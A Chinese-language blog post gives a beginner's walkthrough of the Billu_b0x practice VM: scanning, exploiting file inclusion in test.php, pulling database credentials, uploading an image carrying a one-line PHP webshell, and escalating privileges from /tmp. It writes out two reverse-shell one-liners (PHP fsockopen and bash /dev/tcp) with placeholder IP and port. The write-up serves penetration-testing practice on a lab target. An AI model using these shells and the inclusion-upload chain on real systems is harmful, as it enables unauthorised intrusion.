首页 > 其他分享 >综合渗透---Billu_b0x

综合渗透---Billu_b0x

时间:2024-04-07 10:46:21浏览次数:22  
标签:文件 包含 端口 --- 源码 b0x 80 上传 Billu

开始入门综合渗透-为了巩固学习记个笔记(一开始做了一遍,因为小白为了学习 还是正常思路做)

先看自己ip 然后扫网段(就开了两台机器 去除内部ip 那就只剩131了) 扫它

有个22 和80 看看80有什么

一个网页尝试sql注入顺便试了几次万能密码进不去,网页源码没东西 但是爆破目录出来东西 一个个试

唯一有用的网页就phpmy 和test.php


一看到test.php就感觉很像文件包含 尝试一下 GET方式不行 试试POST

成了 说明有文件下载 那就直接看一开始的网站源码(因为sql语句肯定在里面 可以尝试sql注入)

几个重要点:1.有过滤 2.但是包含文件 过滤太难了 直接看看包含的文件 反正可以下下来 3.从数据库auth查询的账号密码

有数据库账号密码 那就可以直接登phpmy 看账号密码

拿到 返回主页面登录

页面是文件上传并且可以看到你上传的文件信息 二话不说看源码


还是搜集关键点:
1.通过post方式提交add等可以文件包含(上传一句话木马)但是有白名单 文件上传部分绕过pass掉
2.提交的load不为add和show时候会包含你load提交的东西 这是个关键点 说明我们可以上传一个一句话木马图片 通过包含执行命令
3.上传到的路径是uploaded_images 后面包含很有用

提交损坏的jpg等文件会提示上传不了 得在文件后面加一句话木马而且不能让文件损坏 试了好几个图片好不容易试出来一个可以用的

上传好了 试试包含然后执行命令

成了!一次成功 真奇怪我一开始做的时候死活不成功

一句话木马写不进去,就试试反弹shell(大佬们都能写不理解哪里有问题)

反弹shell:
1.php -r '$sock=fsockopen("IP",端口);exec("/bin/sh -i <&3 >&3 2>&3");'
2.bash -c "bash -i >& /dev/tcp/IP/端口 0>&1"


放到网站目录 然后靶机下载编译

没权限 但是要知道linux的tmp目录权限很大 可以在里面执行

成了 提权成功!累die

总结:
思路:1.先看靶机的端口信息(一般主要80端口进去)
2.信息搜集 主要看80端口 看是否有有用的信息(扫目录 看源码)
3.提权 看版本信息是否有漏洞
emmm刚入门只能整理这点 后面继续

标签:文件,包含,端口,---,源码,b0x,80,上传,Billu
From: https://www.cnblogs.com/beat-the-child-to-tears-every-day/p/18118553

相关文章

  • centos7:编译升级 openssh:主要参考“https://github.com/boypt/openssh-rpms”
    参考“https://github.com/boypt/openssh-rpms”  “Releases·boypt/openssh-rpms(github.com)” 安装人家大牛的文档来操作即可。可选的,自行定制 version.env,可进行各种组合! BackportOpenSSHRPM/SRPMforoldCentOSAsimplescripttobuildlatestOpen......
  • 00-prepare
    00-Prepare源作者地址:https://github.com/bonfy/go-mega仅个人学习使用语言安装Go,详情见参照Go的官方网站的安装文档这里介绍下Mac下的安装,适用homebrew:$brewinstallgo#安装完成后查看版本$goversiongoversiongo1.11darwin/amd64#查看goenv$goenv......
  • 03-template-advance
    03-TemplateAdvance源作者地址:https://github.com/bonfy/go-mega仅个人学习使用学习完第二章之后,你对模板已经有了基本的认识本章将讨论Go的组合特性,以及建立一个通用的调用模板的方法本章的GitHub链接为:Source,Diff,Zip匿名组合匿名组合其实是Go里的一个非常......
  • 02-template-basic
    02-TemplateBasic源作者地址:https://github.com/bonfy/go-mega仅个人学习使用学习完第一章之后,我们已经拥有了虽然一个简单,但可以成功运行Web应用本章将沿用这个应用,在此之上,加入模版渲染,使得页面更丰富本章的GitHub链接为:Source,Diff,Zip什么是模板微博应用程序的......
  • 01-hello-world
    01-HelloWorld源作者地址:https://github.com/bonfy/go-mega仅个人学习使用一般计算机书的开头都是HelloWorld我们亦不能免俗,所以本章我们的任务就是完成最简单的HelloWorld本章的GitHub链接为:Source,Zip建立目录结构与Python相比,Go对代码存放的位置还是有讲究......
  • 洛谷题单指南-数学基础问题-P1100 高低位交换
    原题链接:https://www.luogu.com.cn/problem/P1100题意解读:将32位二进制数的高低16位交换位置。解题思路:给定无符号整数a,假设二进制高16为h,低16位为l,即a表示为hl,a>>16得到0h,a<<16得到l0,两者相加即得到lh,交换完毕。需要注意的是,无符号整数的表示是unsignedint,如果是int,......
  • 简单顺序链- - 将第一个链的输出作为第二个链的输入
    fromlangchain.chainsimportLLMChain,SimpleSequentialChain#简单序列链fromlangchain_community.llms.ollamaimportOllamafromlangchain_core.promptsimportPromptTemplatellm=Ollama(model="qwen:7b")template="""您的工作是根据用户建议的区域制......
  • 总结链---对大文本通过拆分总结摘要
    fromlangchain.chainsimportload_summarize_chainfromlangchain_community.document_loadersimportTextLoader#文本加载器fromlangchain_community.llms.ollamaimportOllamafromlangchain_text_splittersimportRecursiveCharacterTextSplitterllm=Ollama(mod......
  • Java毕业设计-基于springboot开发的IT技术交流和分享平台设计与实现-毕业论文(附毕设源
    文章目录前言一、毕设成果演示(源代码在文末)二、毕设摘要展示1、开发说明2、需求分析3、系统功能结构三、系统实现展示1、用户功能模块的实现1.1用户注册界面1.2用户登录界面1.3笔记分享详情界面1.4添加笔记分享界面1.5我的收藏界面2、管理员功能模块的实现2.1管理员登......
  • Java毕业设计-基于springboot开发的javaEE校园二手书交易平台设计与实现-毕业论文(附毕
    文章目录前言一、毕设成果演示(源代码在文末)二、毕设摘要展示1、开发说明2、需求分析3、系统功能结构三、系统实现展示1、用户信息管理2、图书类型管理3、图书信息管理4、公告信息管理四、毕设内容和源代码获取总结Java毕业设计-基于springboot开发的javaEE校园二手......